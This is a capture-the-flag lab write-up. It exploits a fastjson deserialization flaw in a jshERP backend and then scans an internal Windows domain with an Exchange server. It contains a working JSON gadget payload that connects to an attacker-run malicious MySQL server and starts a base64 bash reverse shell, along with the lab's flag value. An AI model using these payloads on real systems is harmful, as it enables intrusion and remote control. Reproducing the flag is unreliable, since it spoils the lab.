Target description:
Exchange is a medium-difficulty lab. Completing it teaches proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement as used in internal penetration testing, deepens the understanding of the core authentication mechanisms of a Windows domain, and covers several interesting techniques of domain penetration. The lab has 4 flags, spread over different hosts. *Note: the lab has only 4 flags; if the environment is still not marked as cleared after all 4 have been submitted, shut the environment down and submit feedback.
FLAG1
Start with a full-port fscan of the external host:
.\fscan.exe -h 39.98.127.105 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
      fscan version: 1.8.1
start infoscan
(icmp) Target 39.98.127.105 is alive
[*] Icmp alive hosts len is: 1
39.98.127.105:80 open
39.98.127.105:22 open
39.98.127.105:8000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle:http://39.98.127.105 code:200 len:19813 title:lumia
[*] WebTitle:http://39.98.127.105:8000 code:302 len:0 title:None redirect url: http://39.98.127.105:8000/login.html
[*] WebTitle:http://39.98.127.105:8000/login.html code:200 len:5662 title:Lumia ERP
completed 3/3
[*] scan finished, elapsed: 5m26.1641278s
Port 80 is a product marketing site.
Port 8000 is the site's management backend (Lumia ERP).
The backend allows self-registration, so register an account.
With the new account we are in the backend.
The backend is 华夏ERP (jshERP) v2.3, which is affected by a fastjson deserialization vulnerability.
Reference: Java 代码审计之华夏 ERP CMS v2.3 - FreeBuf网络安全行业门户
The bundled fastjson version is 1.2.55.
First confirm that the parser honours an attacker-controlled @type by forcing a DNS lookup through java.net.Inet4Address and watching the DNS log:
{"@type":"java.net.Inet4Address","val":"ysgbayuskh.iyhc.eu.org"}
A hit on the DNS log proves that our JSON reaches fastjson and that @type is honoured. It does not by itself prove code execution; that depends on a usable gadget being on the classpath, which is what the next step exploits.
Exploitation
The application ships MySQL Connector/J, so we can stand up a malicious MySQL server with evil-mysql-server (which serves ysoserial payloads) and make the target connect to it through a JDBC gadget:
./evil-mysql-server -addr 3366 -java java -ysoserial ysoserial-all.jar
exp (vpsIP is the address of your server; base64cmd is the base64 of the reverse-shell command):
{
  "name": {
    "@type": "java.lang.AutoCloseable",
    "@type": "com.mysql.jdbc.JDBC4Connection",
    "hostToConnectTo": "vpsIP",
    "portToConnectTo": 3366,
    "info": {
      "user": "yso_CommonsCollections6_bash -c {echo,base64cmd}|{base64,-d}|{bash,-i}",
      "password": "pass",
      "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
      "autoDeserialize": "true",
      "NUM_HOSTS": "1"
    }
  }
}
How the chain works: the duplicated @type makes fastjson instantiate com.mysql.jdbc.JDBC4Connection as an implementation of java.lang.AutoCloseable; constructing the connection dials vpsIP:3366; ServerStatusDiffInterceptor then runs SHOW SESSION STATUS on that connection, and because autoDeserialize=true the driver deserializes the blob column the fake server answers with, which is the ysoserial CommonsCollections6 object selected by the username. The chain therefore needs MySQL Connector/J 5.1.x (the JDBC4Connection class) and Commons Collections on the target classpath; both are present in this jshERP build, which is why it works here.
The reverse shell comes back.
It already runs as root, so read the flag directly:
root@iZ8vb6bns5dh59k418a97hZ:/root/flag# cat f*
cat f*
 ██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████
░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██
 ░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░
 ░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ░██░██
 ██░██ ░██ ██████████░██ ░██░██░░░██ ██████████░██ ░░██░██░██ █████
 ██ ░░██ ░██░██░░░░░░██░░██ ██ ░██ ░░██ ░██░░░░░░██░██ ░░████░░██ ░░░░██
 ██ ░░██░██░██ ░██ ░░███████ ░██ ░░██░██ ░██░██ ░░███ ░░████████
░░ ░░ ░░ ░░ ░░ ░░░░░░░ ░░ ░░ ░░ ░░ ░░ ░░░ ░░░░░░░░

 | | || | /~~\ /\ |\ /|~|~
 | | ||--|| |/__\ | \/ | |
 \/ \/ | | \__// \| |_|_

 flag01: flag{f605c397-0df7-4f55-b013-c7e45be124d0}
FLAG2
root@iZ8vb6bns5dh59k418a97hZ:/tmp# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:1c:80:b4 brd ff:ff:ff:ff:ff:ff
inet 172.22.3.12/16 brd 172.22.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe1c:80b4/64 scope link
valid_lft forever preferred_lft forever
The host sits on 172.22.3.0/16. Upload fscan and scan the /24 around it (excluding ourselves):
root@iZ8vb6bns5dh59k418a97hZ:/tmp# ./fscan -h 172.22.3.0/24 -eh 172.22.3.12 -p 1-65535
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-09 00:51:47] [INFO] brute-force threads: 1
[2025-04-09 00:51:47] [INFO] starting info scan
[2025-04-09 00:51:47] [INFO] CIDR range: 172.22.3.0-172.22.3.255
[2025-04-09 00:51:47] [INFO] generated IP range: 172.22.3.0.%!d(string=172.22.3.255) - %!s(MISSING).%!d(MISSING)
[2025-04-09 00:51:47] [INFO] parsed CIDR 172.22.3.0/24 -> IP range 172.22.3.0-172.22.3.255
[2025-04-09 00:51:48] [INFO] excluded specified hosts: 1
[2025-04-09 00:51:48] [INFO] final valid host count: 255
[2025-04-09 00:51:48] [INFO] starting host scan
[2025-04-09 00:51:48] [SUCCESS] target 172.22.3.2 alive (ICMP)
[2025-04-09 00:51:48] [SUCCESS] target 172.22.3.26 alive (ICMP)
[2025-04-09 00:51:48] [SUCCESS] target 172.22.3.9 alive (ICMP)
[2025-04-09 00:51:51] [INFO] alive hosts: 3
[2025-04-09 00:51:51] [INFO] valid ports: 65535
[2025-04-09 00:51:51] [SUCCESS] port open 172.22.3.9:25
[2025-04-09 00:51:51] [SUCCESS] port open 172.22.3.2:53
[2025-04-09 00:51:51] [SUCCESS] port open 172.22.3.9:80
[2025-04-09 00:51:51] [SUCCESS] port open 172.22.3.2:88
[2025-04-09 00:51:51] [SUCCESS] port open 172.22.3.9:81
[2025-04-09 00:51:51] [SUCCESS] service identified 172.22.3.9:25 => [smtp] product:Microsoft Exchange smtpd os:Windows
[2025-04-09 00:51:51] [SUCCESS] port open 172.22.3.2:135
[2025-04-09 00:51:52] [SUCCESS] port open 172.22.3.9:135
[2025-04-09 00:51:52] [SUCCESS] port open 172.22.3.26:139
[2025-04-09 00:51:52] [SUCCESS] port open 172.22.3.9:139
[2025-04-09 00:51:52] [SUCCESS] port open 172.22.3.2:139
[2025-04-09 00:51:52] [SUCCESS] port open 172.22.3.26:135
[2025-04-09 00:51:55] [SUCCESS] port open 172.22.3.2:389
[2025-04-09 00:51:55] [SUCCESS] port open 172.22.3.9:445
[2025-04-09 00:51:55] [SUCCESS] port open 172.22.3.26:445
[2025-04-09 00:51:55] [SUCCESS] port open 172.22.3.9:444
[2025-04-09 00:51:55] [SUCCESS] port open 172.22.3.2:445
[2025-04-09 00:51:55] [SUCCESS] port open 172.22.3.9:443
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.9:465
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.2:464
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.9:477
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.9:476
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.9:475
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.9:465 => [smtp] product:Microsoft Exchange smtpd os:Windows
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.2:88 =>
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.9:477 => [smtp]
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.9:476 => [smtp]
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.9:475 => [smtp]
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.9:587
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.2:593
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.9:593
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.9:81 => [http]
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.2:636
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.9:587 => [smtp] product:Microsoft Exchange smtpd os:Windows
[2025-04-09 00:51:56] [SUCCESS] port open 172.22.3.9:717
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.2:593 => [ncacn_http] version:1.0 product:Microsoft Windows RPC over HTTP os:Windows Banner:[ncacn_http/1.0]
[2025-04-09 00:51:56] [SUCCESS] service identified 172.22.3.9:593 => [ncacn_http] version:1.0 product:Microsoft Windows RPC over HTTP os:Windows Banner:[ncacn_http/1.0]
[2025-04-09 00:51:57] [SUCCESS] service identified 172.22.3.2:636 =>
[2025-04-09 00:51:57] [SUCCESS] port open 172.22.3.9:808
[2025-04-09 00:51:57] [SUCCESS] port open 172.22.3.9:890
[2025-04-09 00:51:57] [SUCCESS] service identified 172.22.3.9:717 => [smtp] product:Microsoft Exchange smtpd os:Windows
[2025-04-09 00:51:57] [SUCCESS] service identified 172.22.3.26:139 => Banner:[.]
[2025-04-09 00:51:57] [SUCCESS] service identified 172.22.3.9:139 => Banner:[.]
[2025-04-09 00:51:57] [SUCCESS] service identified 172.22.3.2:139 => Banner:[.]
[2025-04-09 00:51:57] [SUCCESS] port open 172.22.3.9:1801
[2025-04-09 00:51:57] [SUCCESS] service identified 172.22.3.9:80 => [http] version:10.0 product:Microsoft IIS httpd os:Windows
[2025-04-09 00:51:57] [SUCCESS] port open 172.22.3.9:2103
[2025-04-09 00:51:58] [SUCCESS] port open 172.22.3.9:2107
[2025-04-09 00:51:58] [SUCCESS] port open 172.22.3.9:2105
[2025-04-09 00:52:00] [SUCCESS] service identified 172.22.3.2:389 => [ldap] product:Microsoft Windows Active Directory LDAP os:Windows info:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-09 00:52:00] [SUCCESS] service identified 172.22.3.9:445 =>
[2025-04-09 00:52:00] [SUCCESS] port open 172.22.3.9:2525
[2025-04-09 00:52:00] [SUCCESS] service identified 172.22.3.26:445 =>
[2025-04-09 00:52:00] [SUCCESS] service identified 172.22.3.9:2525 => [smtp] product:Microsoft Exchange smtpd os:Windows
[2025-04-09 00:52:00] [SUCCESS] service identified 172.22.3.2:445 =>
[2025-04-09 00:52:00] [SUCCESS] port open 172.22.3.2:3268
[2025-04-09 00:52:01] [SUCCESS] port open 172.22.3.2:3269
[2025-04-09 00:52:01] [SUCCESS] service identified 172.22.3.2:3269 =>
[2025-04-09 00:52:01] [SUCCESS] service identified 172.22.3.2:464 =>
[2025-04-09 00:52:01] [SUCCESS] port open 172.22.3.2:3389
[2025-04-09 00:52:01] [SUCCESS] port open 172.22.3.26:3389
[2025-04-09 00:52:01] [SUCCESS] port open 172.22.3.9:3389
[2025-04-09 00:52:02] [SUCCESS] service identified 172.22.3.9:808 =>
[2025-04-09 00:52:02] [SUCCESS] service identified 172.22.3.9:890 =>
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3800
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3801
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3803
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3823
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3828
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3843
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3863
[2025-04-09 00:52:02] [SUCCESS] port open 172.22.3.9:3867
[2025-04-09 00:52:03] [SUCCESS] port open 172.22.3.9:3875
[2025-04-09 00:52:05] [SUCCESS] service identified 172.22.3.2:3268 => [ldap] product:Microsoft Windows Active Directory LDAP os:Windows info:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-09 00:52:06] [SUCCESS] service identified 172.22.3.26:3389 =>
[2025-04-09 00:52:06] [SUCCESS] port open 172.22.3.9:5060
[2025-04-09 00:52:07] [SUCCESS] port open 172.22.3.9:5062
[2025-04-09 00:52:07] [SUCCESS] port open 172.22.3.9:5065
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:3801 =>
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:3803 =>
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:1801 =>
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:3823 =>
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:3828 =>
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:3843 =>
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:3863 =>
[2025-04-09 00:52:07] [SUCCESS] service identified 172.22.3.9:3867 =>
[2025-04-09 00:52:07] [SUCCESS] port open 172.22.3.9:6001
[2025-04-09 00:52:08] [SUCCESS] service identified 172.22.3.9:6001 => [ncacn_http] version:1.0 product:Microsoft Windows RPC over HTTP os:Windows Banner:[ncacn_http/1.0]
[2025-04-09 00:52:07] [SUCCESS] port open 172.22.3.9:6027
[2025-04-09 00:52:07] [SUCCESS] port open 172.22.3.9:6049
[2025-04-09 00:52:07] [SUCCESS] port open 172.22.3.9:6057
[2025-04-09 00:52:08] [SUCCESS] port open 172.22.3.9:6081
[2025-04-09 00:52:08] [SUCCESS] port open 172.22.3.9:6095
[2025-04-09 00:52:08] [SUCCESS] port open 172.22.3.9:6102
[2025-04-09 00:52:08] [SUCCESS] port open 172.22.3.9:6119
[2025-04-09 00:52:08] [SUCCESS] port open 172.22.3.9:6129
[2025-04-09 00:52:08] [SUCCESS] port open 172.22.3.9:6153
[2025-04-09 00:52:08] [SUCCESS] port open 172.22.3.9:6193
[2025-04-09 00:52:09] [SUCCESS] port open 172.22.3.9:6228
[2025-04-09 00:52:11] [SUCCESS] port open 172.22.3.9:6401
[2025-04-09 00:52:11] [SUCCESS] port open 172.22.3.9:6405
[2025-04-09 00:52:11] [SUCCESS] port open 172.22.3.9:6400
[2025-04-09 00:52:11] [SUCCESS] port open 172.22.3.9:6404
[2025-04-09 00:52:11] [SUCCESS] port open 172.22.3.9:6430
[2025-04-09 00:52:11] [SUCCESS] service identified 172.22.3.9:5060 =>
[2025-04-09 00:52:11] [SUCCESS] port open 172.22.3.9:6448
[2025-04-09 00:52:12] [SUCCESS] port open 172.22.3.9:6449
[2025-04-09 00:52:12] [SUCCESS] port open 172.22.3.9:6454
[2025-04-09 00:52:12] [SUCCESS] port open 172.22.3.9:6490
[2025-04-09 00:52:12] [SUCCESS] port open 172.22.3.9:6492
[2025-04-09 00:52:12] [SUCCESS] port open 172.22.3.9:6497
[2025-04-09 00:52:12] [SUCCESS] service identified 172.22.3.9:3800 => [http] version:2.0 product:Microsoft HTTPAPI httpd os:Windows
[2025-04-09 00:52:12] [SUCCESS] port open 172.22.3.9:6512
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6514
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6548
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6550
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6560
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6571
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6564
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6570
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6572
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6578
[2025-04-09 00:52:13] [SUCCESS] port open 172.22.3.9:6590
[2025-04-09 00:52:14] [SUCCESS] port open 172.22.3.9:6594
[2025-04-09 00:52:14] [SUCCESS] port open 172.22.3.9:6606
[2025-04-09 00:52:14] [SUCCESS] port open 172.22.3.9:6616
[2025-04-09 00:52:14] [SUCCESS] port open 172.22.3.9:6621
[2025-04-09 00:52:14] [SUCCESS] port open 172.22.3.9:6624
[2025-04-09 00:52:14] [SUCCESS] port open 172.22.3.9:6642
[2025-04-09 00:52:14] [SUCCESS] port open 172.22.3.9:6664
[2025-04-09 00:52:15] [SUCCESS] port open 172.22.3.9:6685
[2025-04-09 00:52:15] [SUCCESS] port open 172.22.3.9:6690
[2025-04-09 00:52:15] [SUCCESS] port open 172.22.3.9:6719
[2025-04-09 00:52:15] [SUCCESS] port open 172.22.3.9:6728
[2025-04-09 00:52:15] [SUCCESS] port open 172.22.3.9:6741
[2025-04-09 00:52:15] [SUCCESS] port open 172.22.3.9:6770
[2025-04-09 00:52:17] [SUCCESS] service identified 172.22.3.9:5062 =>
[2025-04-09 00:52:17] [SUCCESS] service identified 172.22.3.9:5065 =>
[2025-04-09 00:52:17] [SUCCESS] port open 172.22.3.9:6772
[2025-04-09 00:52:18] [SUCCESS] port open 172.22.3.9:7673
[2025-04-09 00:52:19] [SUCCESS] service identified 172.22.3.9:6664 =>
[2025-04-09 00:52:20] [SUCCESS] port open 172.22.3.9:8172
[2025-04-09 00:52:51] [SUCCESS] service identified 172.22.3.2:53 =>
[2025-04-09 00:52:52] [SUCCESS] port open 172.22.3.2:9389
[2025-04-09 00:52:53] [SUCCESS] service identified 172.22.3.9:2103 =>
[2025-04-09 00:52:53] [SUCCESS] port open 172.22.3.9:9710
[2025-04-09 00:52:53] [SUCCESS] service identified 172.22.3.9:2107 =>
[2025-04-09 00:52:55] [SUCCESS] port open 172.22.3.9:12393
[2025-04-09 00:52:55] [SUCCESS] service identified 172.22.3.9:444 =>
[2025-04-09 00:52:56] [SUCCESS] service identified 172.22.3.2:135 =>
[2025-04-09 00:52:57] [SUCCESS] port open 172.22.3.26:15774
[2025-04-09 00:52:57] [SUCCESS] service identified 172.22.3.2:9389 =>
[2025-04-09 00:52:57] [SUCCESS] service identified 172.22.3.9:135 =>
[2025-04-09 00:52:57] [SUCCESS] service identified 172.22.3.26:135 =>
[2025-04-09 00:52:58] [SUCCESS] service identified 172.22.3.9:9710 =>
[2025-04-09 00:52:58] [SUCCESS] service identified 172.22.3.9:3875 =>
[2025-04-09 00:52:58] [SUCCESS] service identified 172.22.3.9:2105 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6027 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6049 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6057 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6081 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6095 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6102 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6119 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6129 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6153 =>
[2025-04-09 00:53:03] [SUCCESS] service identified 172.22.3.9:6193 =>
[2025-04-09 00:53:04] [SUCCESS] service identified 172.22.3.9:6228 =>
[2025-04-09 00:53:05] [SUCCESS] service identified 172.22.3.9:12393 =>
[2025-04-09 00:53:06] [SUCCESS] service identified 172.22.3.9:6401 =>
[2025-04-09 00:53:06] [SUCCESS] service identified 172.22.3.9:6405 =>
[2025-04-09 00:53:06] [SUCCESS] service identified 172.22.3.9:6400 =>
[2025-04-09 00:53:06] [SUCCESS] service identified 172.22.3.2:3389 =>
[2025-04-09 00:53:06] [SUCCESS] service identified 172.22.3.9:6404 =>
[2025-04-09 00:53:06] [SUCCESS] service identified 172.22.3.9:6430 =>
[2025-04-09 00:53:06] [SUCCESS] service identified 172.22.3.9:3389 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.9:6448 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.26:15774 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.9:6449 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.9:6454 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.9:6490 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.9:6492 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.9:6497 =>
[2025-04-09 00:53:07] [SUCCESS] service identified 172.22.3.9:6512 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6514 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6548 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6550 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6571 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6564 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6570 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6572 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6578 =>
[2025-04-09 00:53:08] [SUCCESS] service identified 172.22.3.9:6590 =>
[2025-04-09 00:53:09] [SUCCESS] service identified 172.22.3.9:6594 =>
[2025-04-09 00:53:09] [SUCCESS] service identified 172.22.3.9:6606 =>
[2025-04-09 00:53:09] [SUCCESS] service identified 172.22.3.9:6616 =>
[2025-04-09 00:53:09] [SUCCESS] service identified 172.22.3.9:6621 =>
[2025-04-09 00:53:09] [SUCCESS] service identified 172.22.3.9:6624 =>
[2025-04-09 00:53:09] [SUCCESS] service identified 172.22.3.9:6642 =>
[2025-04-09 00:53:10] [SUCCESS] service identified 172.22.3.9:6685 =>
[2025-04-09 00:53:10] [SUCCESS] service identified 172.22.3.9:6690 =>
[2025-04-09 00:53:10] [SUCCESS] service identified 172.22.3.9:6719 =>
[2025-04-09 00:53:10] [SUCCESS] service identified 172.22.3.9:6728 =>
[2025-04-09 00:53:10] [SUCCESS] service identified 172.22.3.9:6741 =>
[2025-04-09 00:53:10] [SUCCESS] service identified 172.22.3.9:6770 =>
[2025-04-09 00:53:12] [SUCCESS] service identified 172.22.3.9:6772 =>
[2025-04-09 00:53:13] [SUCCESS] service identified 172.22.3.9:7673 =>
[2025-04-09 00:53:13] [SUCCESS] service identified 172.22.3.9:6560 =>
[2025-04-09 00:53:15] [SUCCESS] service identified 172.22.3.9:8172 =>
[2025-04-09 00:53:20] [SUCCESS] service identified 172.22.3.9:443 =>
[2025-04-09 00:53:31] [SUCCESS] port open 172.22.3.2:47001
[2025-04-09 00:53:31] [SUCCESS] port open 172.22.3.26:47001
[2025-04-09 00:53:31] [SUCCESS] port open 172.22.3.9:47001
[2025-04-09 00:53:36] [SUCCESS] service identified 172.22.3.2:47001 => [http]
[2025-04-09 00:53:36] [SUCCESS] service identified 172.22.3.9:47001 => [http]
[2025-04-09 00:53:36] [SUCCESS] service identified 172.22.3.26:47001 => [http]
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49665
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49664
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49667
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49664
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49666
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49667
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49666
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49665
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49668
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49669
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49670
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49671
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49673
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49674
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49675
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49677
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.26:49678
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49684
[2025-04-09 00:53:38] [SUCCESS] port open 172.22.3.2:49695
[2025-04-09 00:53:39] [SUCCESS] service identified 172.22.3.2:49674 => [ncacn_http] version:1.0 product:Microsoft Windows RPC over HTTP os:Windows Banner:[ncacn_http/1.0]
[2025-04-09 00:53:55] [SUCCESS] port open 172.22.3.2:52352
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.2:49665 =>
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.26:49664 =>
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.2:49667 =>
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.2:49664 =>
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.2:49666 =>
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.26:49667 =>
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.26:49666 =>
[2025-04-09 00:54:33] [SUCCESS] service identified 172.22.3.26:49665 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.26:49668 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.26:49669 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.26:49670 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.2:49671 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.26:49673 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.2:49675 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.2:49677 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.26:49678 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.2:49684 =>
[2025-04-09 00:54:34] [SUCCESS] service identified 172.22.3.2:49695 =>
[2025-04-09 00:54:46] [SUCCESS] port open 172.22.3.9:64327
[2025-04-09 00:54:46] [SUCCESS] port open 172.22.3.9:64337
[2025-04-09 00:54:50] [SUCCESS] service identified 172.22.3.2:52352 =>
[2025-04-09 00:54:51] [SUCCESS] service identified 172.22.3.9:64337 =>
[2025-04-09 00:55:41] [SUCCESS] service identified 172.22.3.9:64327 =>
[2025-04-09 00:55:41] [INFO] open ports: 130
[2025-04-09 00:55:41] [INFO] starting vuln scan
[2025-04-09 00:55:41] [INFO] loaded plugins: findnet, ldap, ms17010, netbios, rdp, smb, smb2, smbghost, smtp, webpoc, webtitle
[2025-04-09 00:55:41] [SUCCESS] web title http://172.22.3.9 status:403 length:0 title:none
[2025-04-09 00:55:41] [SUCCESS] NetInfo scan result
target host: 172.22.3.9
hostname: XIAORANG-EXC01
discovered network interfaces:
   IPv4 addresses:
      └─ 172.22.3.9
[2025-04-09 00:55:41] [SUCCESS] NetInfo scan result
target host: 172.22.3.2
hostname: XIAORANG-WIN16
discovered network interfaces:
   IPv4 addresses:
      └─ 172.22.3.2
[2025-04-09 00:55:41] [INFO] system info 172.22.3.2 [Windows Server 2016 Datacenter 14393]
[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.26 XIAORANG\XIAORANG-PC
[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.2 DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-09 00:55:41] [SUCCESS] web title http://172.22.3.9:81 status:403 length:1157 title:403 - Forbidden: Access is denied.
[2025-04-09 00:55:41] [SUCCESS] NetInfo scan result
target host: 172.22.3.26
hostname: XIAORANG-PC
discovered network interfaces:
   IPv4 addresses:
      └─ 172.22.3.26
[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-09 00:55:42] [SUCCESS] SMTP service 172.22.3.9:25 allows anonymous access
[2025-04-09 00:55:42] [SUCCESS] web title https://172.22.3.9 status:302 length:0 title:none redirect: https://172.22.3.9/owa/
[2025-04-09 00:55:42] [SUCCESS] web title https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 status:200 length:28237 title:Outlook
[2025-04-09 00:55:42] [SUCCESS] web title https://172.22.3.9:8172 status:404 length:0 title:none
Three hosts found:
172.22.3.9 XIAORANG-EXC01 (Exchange: OWA on 443, SMTP on 25/587, RPC over HTTP on 593/6001)
172.22.3.2 DC: XIAORANG-WIN16.xiaorang.lab (domain controller: Kerberos 88, LDAP 389/636, global catalog 3268/3269)
172.22.3.26 XIAORANG-PC (SMB 445, RDP 3389)
